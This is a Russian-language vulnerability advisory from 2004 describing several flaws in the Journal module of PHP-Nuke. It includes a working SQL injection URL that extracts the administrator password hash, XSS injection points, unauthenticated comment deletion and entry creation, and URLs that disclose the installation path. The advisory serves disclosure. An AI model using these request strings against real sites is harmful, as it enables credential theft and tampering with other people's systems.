Множественные уязвимости в PHP-Nuke

Дата публикации:
25.06.2004
Дата изменения:
17.10.2006
Всего просмотров:
1961
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke

Описание: Обнаружено несколько уязвимостей в PHP-Nuke. Удаленный атакующий может внедрить SQL код, выполнить произвольный сценарий в браузере жертвы и получить полный путь к установочной директории на сервере.

1. SQL-инъекция существует в сценарии 'modules/Journal/search.php'. Удаленный аткующий может выполнить SQL команды посредством переменных 'bywhat' и 'forwhat'. Пример получения хешированного пароля администратора:

http://localhost/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1
&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/ **/FROM/**/nuke_authors/**/
WHERE/**/radminsuper=1/**/LIMIT/**/1/*

2. Некоторые сценарии в модуле Journal некорректно обрабатывают введенные пользователем данные. Удаленный атакующий может с помощью специально сформированного URL получить доступ к важной информации пользователей:

http://localhost/nuke73/modules.php? name=Jour nal&file=friend&jid=2&yun=[xss code here]
http://localhost/nuke73/modules.php? name=Journal&file=friend&jid=2&ye=[xss code here]
http://localhost/nuke73/modules.php? name=Journal&file=add&filelist[]=[xss code here]
http://localhost/nuke73/modules.php? name=Journal&file=modify&filelist[]=[xss code here]
http://localhost/nuke73/modules.php? name=Journal&file=delete&jid=[xss code here]&forwhat=waraxe
http://localhost/nuke73/modules.php? name=Journal&file=com ment&onwhat=[xss code here]
http://localhost/nuke73/modules.php? name=Journal&file=commentsave&rid=[xss code here]

3. Сценарий 'modules/Journal/commentkill.php' не требует аутентификации и позволяет удалить произвольный комментарий:

http://localhost/nuke73/modules.php?name=Journal&file=commen tkill&onwhat=1

4. Сценарий 'modules/Journal/savenew.php' также не требует аутентификации, и позволяет злоумышленнику добавить в журнал записи:

http://localhost/nuke73/modules.php?name=Journal&file=savenew&title=f00bar

5. Злоумышленник может получить путь к установочной директории приложения:

http://localhost/nuke73/modules/Web_Links/voteinclude.php
http://localhost/nuke73/modules.php?name=Statistics&op= convert_month
http://localhost/nuke73/modules.php?name=Journal&file=add&filelist=f00bar
http://localhost/nuke73/modules.php?name=Journal&file=modify&filelist=f00bar

URL производителя:http://www.phpnuke.org/

Решение: Решение не существует.

Ссылки: Multiple security holes in PhpNuke

или введите имя

CAPTCHA